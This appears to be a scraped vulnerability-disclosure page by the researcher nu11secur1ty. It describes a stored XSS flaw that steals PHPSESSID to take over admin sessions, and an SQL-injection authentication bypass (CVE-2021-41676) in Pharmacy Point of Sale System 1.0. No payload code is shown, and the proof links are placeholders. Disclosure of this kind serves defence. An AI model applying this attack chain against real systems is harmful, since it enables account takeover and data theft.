  1. XSS – Stored PHPSESSID Vulnerable
  • The vulnerable XSS app: is “maintenance”, parameters: “name” After the successful SQL injection, the malicious user can be storing an XSS payload whit who can take the
    active PHPSESSID session.
  1. remote PHPSESSID – Injection
  • After the successful XSS attack the malicious user can take control of the administrative account of the system from everywhere
    by using the PHPSESSID, and then he can make a lot of bad things!

CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer!

BR

  • [+] @nu11secur1ty System Administrator – Infrastructure and Penetration Testing Engineer

Reproduce:

href

Proof:

href

BR nu11secur1ty

1
Ratings
  • Attacker Value
    Very High
  • Exploitability
    Very High
Technical Analysis

CVE-2021-41676

Vendor

Software

Description:

The Pharmacy Point of Sale System 1.0 is vulnerable to SQL Injection Bypass Authentication for the admin account.
The malicious user can use a malicious SQL query to login into the system as an administrator and can corrupt and use the sensitive information from this system.

Proof:

href

Also see this collection:

https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23